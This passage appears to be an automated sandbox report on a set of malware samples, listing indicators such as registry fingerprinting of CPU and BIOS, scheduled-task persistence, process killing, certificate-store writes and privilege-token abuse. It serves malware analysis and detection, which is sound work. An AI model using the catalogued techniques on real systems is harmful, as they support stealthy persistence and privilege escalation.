\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dx3mskZpc_3BwBlnPkPHfehD.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 9738.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe -
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6072 schtasks.exe 6284 schtasks.exe 4788 schtasks.exe 6520 schtasks.exe 6536 schtasks.exe 1108 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3820 timeout.exe -
Enumerates system info in registry 2 TTPs 64 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS rr4RD3RBL7HTmHEvcuU1pqzk.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU rr4RD3RBL7HTmHEvcuU1pqzk.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS 9738.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU 9738.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Kills process with taskkill 4 IoCs
pid Process 3040 taskkill.exe 1992 taskkill.exe 6384 taskkill.exe 12464 taskkill.exe -
Modifies data under HKEY_USERS 46 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs 1041.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs 1041.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 1041.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 1041.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 1041.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates 1041.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs 1041.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust 1041.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates 1041.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs 1041.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 1041.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs 1041.exe Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs 1041.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 1041.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs 1041.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs 1041.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs 1041.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust 1041.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\7\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs 1041.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA 1041.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 1041.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs 1041.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA 1041.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates 1041.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs 1041.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates 1041.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs 1041.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root 1041.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs 1041.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople 1041.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates 1041.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot 1041.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs 1041.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs 1041.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates 1041.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates 1041.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\7 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates 1041.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 1041.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 1041.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople 1041.exe -
Modifies registry class 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ Process not Found -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3540 powershell.exe 3540 powershell.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe 5176 Thu2094524d5e5b.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3208 Process not Found -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 5760 MKkaEokfG5R_kn2oaNMJZOa0.exe 5104 1CC5.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeCreateTokenPrivilege 4704 Thu203b503b429e68.exe Token: SeAssignPrimaryTokenPrivilege 4704 Thu203b503b429e68.exe Token: SeLockMemoryPrivilege 4704 Thu203b503b429e68.exe Token: SeIncreaseQuotaPrivilege 4704 Thu203b503b429e68.exe Token: SeMachineAccountPrivilege 4704 Thu203b503b429e68.exe Token: SeTcbPrivilege 4704 Thu203b503b429e68.exe Token: SeSecurityPrivilege 4704 Thu203b503b429e68.exe Token: SeTakeOwnershipPrivilege 4704 Thu203b503b429e68.exe Token: SeLoadDriverPrivilege 4704 Thu203b503b429e68.exe Token: SeSystemProfilePrivilege 4704 Thu203b503b429e68.exe Token: SeSystemtimePrivilege 4704 Thu203b503b429e68.exe Token: SeProfSingleProcessPrivilege 4704 Thu203b503b429e68.exe Token: SeIncBasePriorityPrivilege 4704 Thu203b503b429e68.exe Token: SeCreatePagefilePrivilege 4704 Thu203b503b429e68.exe Token: SeCreatePermanentPrivilege 4704 Thu203b503b429e68.exe Token: SeBackupPrivilege 4704 Thu203b503b429e68.exe Token: SeRestorePrivilege 4704 Thu203b503b429e68.exe Token: SeShutdownPrivilege 4704 Thu203b503b429e68.exe Token: SeDebugPrivilege 4704 Thu203b503b429e68.exe Token: SeAuditPrivilege 4704 Thu203b503b429e68.exe Token: SeSystemEnvironmentPrivilege 4704 Thu203b503b429e68.exe Token: SeChangeNotifyPrivilege 4704 Thu203b503b429e68.exe Token: SeRemoteShutdownPrivilege 4704 Thu203b503b429e68.exe Token: SeUndockPrivilege 4704 Thu203b503b429e68.exe Token: SeSyncAgentPrivilege 4704 Thu203b503b429e68.exe Token: SeEnableDelegationPrivilege 4704 Thu203b503b429e68.exe Token: SeManageVolumePrivilege 4704 Thu203b503b429e68.exe Token: SeImpersonatePrivilege 4704 Thu203b503b429e68.exe Token: SeCreateGlobalPrivilege 4704 Thu203b503b429e68.exe Token: 31 4704 Thu203b503b429e68.exe Token: 32 4704 Thu203b503b429e68.exe Token: 33 4704 Thu203b503b429e68.exe Token: 34 4704 Thu203b503b429e68.exe Token: 35 4704 Thu203b503b429e68.exe Token: SeDebugPrivilege 4388 Thu20f2cf5e0c.exe Token: SeDebugPrivilege 3540 powershell.exe Token: SeDebugPrivilege 5712 PublicDwlBrowser1100.exe Token: SeDebugPrivilege 5908 2.exe Token: SeDebugPrivilege 5188 Thu2090b5515d63b2.exe Token: SeRestorePrivilege 5144 WerFault.exe Token: SeBackupPrivilege 5144 WerFault.exe Token: SeBackupPrivilege 5144 WerFault.exe Token: SeDebugPrivilege 5292 BearVpn 3.exe Token: SeDebugPrivilege 4968 7705280.scr Token: SeDebugPrivilege 5780 Install.exe Token: SeCreateTokenPrivilege 5004 2fRUngdME9bOU9FVYsq4kr39.exe Token: SeAssignPrimaryTokenPrivilege 5004 